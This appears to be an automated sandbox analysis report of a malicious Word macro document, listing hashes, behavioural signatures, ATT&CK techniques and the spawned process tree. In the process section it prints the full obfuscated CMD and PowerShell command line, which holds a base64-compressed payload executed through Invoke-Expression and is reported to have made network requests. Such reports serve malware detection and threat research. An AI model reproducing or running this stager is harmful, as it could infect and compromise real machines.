788f2664d8d90cc23b7b0f987112fdd80c54de4ba9566a5714392b7fe0208fe9

General

Target

e36605b4d8b6e37b33ef0228bee7c764_JaffaCakes118.doc
Size

78KB
MD5

e36605b4d8b6e37b33ef0228bee7c764
SHA1

36aa582a3a4d540d1c1335fd5cc9a37af8d65010
SHA256

788f2664d8d90cc23b7b0f987112fdd80c54de4ba9566a5714392b7fe0208fe9
SHA512

5cd157b31e7fab60f52f8b23bcfff37b2715a2c0916f6b76c732c094b8e040b5bf92b423e3c98e0086062711fb82dd61d03378aea181947c76379bb78f88dc1d
SSDEEP

768:Q/ZVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9KTwiRZ1u2O7VQnoH:EZocn1kp59gxBK85fBt+a9KNRvi

Score

10^/10

discovery

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

CMD.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	3004	1732	CMD.exe	WINWORD.EXE

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exe

flow pid process

7 2312 powershell.exe
9 2312 powershell.exe
11 2312 powershell.exe
13 2312 powershell.exe
15 2312 powershell.exe
16 2312 powershell.exe
Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE

flow	pid	process
7	2312	powershell.exe
9	2312	powershell.exe
11	2312	powershell.exe
13	2312	powershell.exe
15	2312	powershell.exe
16	2312	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

WINWORD.EXECMD.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1732 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2312 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2312 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1732 WINWORD.EXE
1732 WINWORD.EXE

pid	process
1732	WINWORD.EXE

pid	process
2312	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2312	powershell.exe

pid	process
1732	WINWORD.EXE
1732	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WINWORD.EXECMD.exe

description	pid	process	target process
PID 1732 wrote to memory of 3060	1732	WINWORD.EXE	splwow64.exe
PID 1732 wrote to memory of 3060	1732	WINWORD.EXE	splwow64.exe
PID 1732 wrote to memory of 3060	1732	WINWORD.EXE	splwow64.exe
PID 1732 wrote to memory of 3060	1732	WINWORD.EXE	splwow64.exe
PID 1732 wrote to memory of 3004	1732	WINWORD.EXE	CMD.exe
PID 1732 wrote to memory of 3004	1732	WINWORD.EXE	CMD.exe
PID 1732 wrote to memory of 3004	1732	WINWORD.EXE	CMD.exe
PID 1732 wrote to memory of 3004	1732	WINWORD.EXE	CMD.exe
PID 3004 wrote to memory of 2312	3004	CMD.exe	powershell.exe
PID 3004 wrote to memory of 2312	3004	CMD.exe	powershell.exe
PID 3004 wrote to memory of 2312	3004	CMD.exe	powershell.exe
PID 3004 wrote to memory of 2312	3004	CMD.exe	powershell.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e36605b4d8b6e37b33ef0228bee7c764_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1732

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:3060

C:\Windows\SysWOW64\CMD.exe
CMD C:\WINDowS\systEm32\CMD.exE /C "set kidZ= . ( $sHellid[1]+$SHELlID[13]+'X')(new-oBject sySTEM.IO.comPRESSiON.deFLatesTreaM( [IO.MeMOrYStReAM][CONVERT]::fRoMbASE64stRINg('NZBBawIxEIX/yh4CUazJzWrDgqViEVEPFraFXrJxiqnZSZqdNWvF/95V6vV9bz6Yx5azTY6Qhr78BkPZGkgUUL44C0iKbdfPOd8ThScpbWiM07XxzqKuhfGVHLej7bxNj9P/Sh2aGKKv/I2WE/hYFKs7TCmJGkwE0tFqaAmwth5FgyRg1wgdZQpD47EDJMvl/Y7AuRPp3UELBJJJb/Tb7PdOwflK1I08crENzlKPT3lfsR8sszzjo/GEK/b6XuQM8PhEUIUB/+SDKx9wAS1w9eUjaLPvsaJZZRaz69P9M8XTmXXjiJlP6Lzeza2DW+chuwr7aoFHf4DhopPeElV2noO6GE1mf75c/gA='), [syStEM.io.cOmprEsSIoN.compRESsiONMODe]::dECOMpREsS ) ^|% {new-oBject iO.STrEamREADEr($_,[sYStEM.TexT.eNCoDinG]::AsCII)}).ReaDTOENd( ) && powErShelL ${7`4k} =[tYpE]( \"{0}{2}{1}\" -F'E','NMeNT','NvIro' ) ; ${eX`eCuTI`oNCoNt`EXt}.\"In`VoKEc`OmM`AnD\".(\"{1}{0}{2}\"-f'kEscr','iNVo','ipT').Invoke(( ${7`4K}::( \"{0}{2}{3}{4}{1}\" -f'geTeN','BLE','v','iROnmE','ntVaRIa' ).Invoke( (\"{0}{1}\" -f 'k','Idz'),( \"{1}{0}\"-f'Ss','PRoce' )) ) )"
2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powErShelL ${7`4k} =[tYpE]( \"{0}{2}{1}\" -F'E','NMeNT','NvIro' ) ; ${eX`eCuTI`oNCoNt`EXt}.\"In`VoKEc`OmM`AnD\".(\"{1}{0}{2}\"-f'kEscr','iNVo','ipT').Invoke(( ${7`4K}::( \"{0}{2}{3}{4}{1}\" -f'geTeN','BLE','v','iROnmE','ntVaRIa' ).Invoke( (\"{0}{1}\" -f 'k','Idz'),( \"{1}{0}\"-f'Ss','PRoce' )) ) )
3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2312

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
c555b8f0042d9b6a880e56e54508ece0

SHA1
d49077620311b19f005309908761b06cc6c366ab

SHA256
a62219932049d8df16e7ef03a4d33bb03b9be910ff2eef9ac71dd2e0ad93ae14

SHA512
026eb8d409cc6f0e02453c08d9ca144fc74831230f75daa73f4538cabd8c52d939c829c45276e5950bb385d3f0758edbfbdaeb813c330c157a2accf032e29df0

Download Submit
memory/1732-0-0x000000002FAA1000-0x000000002FAA2000-memory.dmp

Filesize
4KB

Download
memory/1732-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1732-2-0x0000000070F4D000-0x0000000070F58000-memory.dmp

Filesize
44KB

Download
memory/1732-4-0x0000000000710000-0x0000000000810000-memory.dmp

Filesize
1024KB

Download
memory/1732-6-0x0000000000710000-0x0000000000810000-memory.dmp

Filesize
1024KB

Download
memory/1732-10-0x0000000070F4D000-0x0000000070F58000-memory.dmp

Filesize
44KB

Download
memory/1732-14-0x0000000000710000-0x0000000000810000-memory.dmp

Filesize
1024KB

Download
memory/1732-32-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1732-34-0x0000000000710000-0x0000000000810000-memory.dmp

Filesize
1024KB

Download
memory/1732-33-0x0000000070F4D000-0x0000000070F58000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads